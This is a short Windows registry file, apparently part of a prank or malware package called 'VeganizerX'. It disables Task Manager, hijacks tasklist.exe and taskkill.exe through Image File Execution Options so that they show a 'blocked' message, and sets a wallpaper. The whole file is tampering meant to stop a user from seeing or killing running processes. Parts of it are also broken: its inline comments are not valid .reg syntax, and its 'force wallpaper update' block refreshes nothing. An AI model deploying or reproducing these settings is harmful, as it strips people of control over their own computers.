Windows Registry Editor Version 5.00

; block task manager
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001

; set permissions to block tasklist.exe and taskkill.exe
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tasklist.exe]
"Debugger"="msg * Action blocked! You do not have permission to use the tasklist command."

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe]
"Debugger"="msg * Action blocked! You do not have permission to use the taskkill command."

; set the wallpaper
[HKEY_CURRENT_USER\Control Panel\Desktop]
"Wallpaper"="C:\VeganizerX\wallpaper.png"
"WallpaperStyle"="2"  ; 2 to stretch
"TileWallpaper"="0"   ; 0 to not tile

; force wallpaper update
[HKEY_CURRENT_USER\Control Panel\Desktop]
"WallpaperStyle"="2"
"TileWallpaper"="0"